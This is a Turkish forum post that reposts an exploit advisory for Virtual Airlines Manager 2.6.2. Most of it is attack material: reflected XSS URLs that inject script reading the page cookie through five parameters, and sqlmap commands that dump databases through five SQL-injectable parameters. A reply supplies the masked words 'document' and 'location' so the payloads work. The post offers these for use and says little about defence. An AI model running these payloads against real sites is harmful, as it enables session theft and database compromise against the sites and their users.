Virtual Airlines Manager 2.6.2 - 'id' SQL Injection

THROOT · 17 Haz 2020

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
# Date: 2020-06-09
# Exploit Author: Mosaaed
# Vendor Homepage: Virtual Airlines Manager
# Dork: N/A
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A

-------------------
xss

http://localhost/vam/index.php?page=plane_info_public&registry_id=><<script>alert(********.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_icao=1><<script>alert(********.cookie);//<</script>
http://localhost/vam/index.php?page=hub&hub_id=1><<script>alert(********.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_********=1><<script>alert(********.cookie);//<</script>
http://localhost/vam/index.php?page=event&event_id=1><<script>alert(********.cookie);//<</script>
-------------------------
SQL Injection
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --db
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_********=1" -p plane_******** --dbs

Edros Detretus · 17 Haz 2020

******* olan bölümlerde d ocument, l ocation gibi ibareler olacak arkadaşlar. (Boşluğu silerek yazınız.)

Ayrıntılı Bilgi : https://www.exploit-db.com/exploits/48574

Virtual Airlines Manager 2.6.2 - 'id' SQL Injection

THROOT

Kıdemli Üye

Edros Detretus

Kıdemli Üye

Sosyal medya sayfalarımız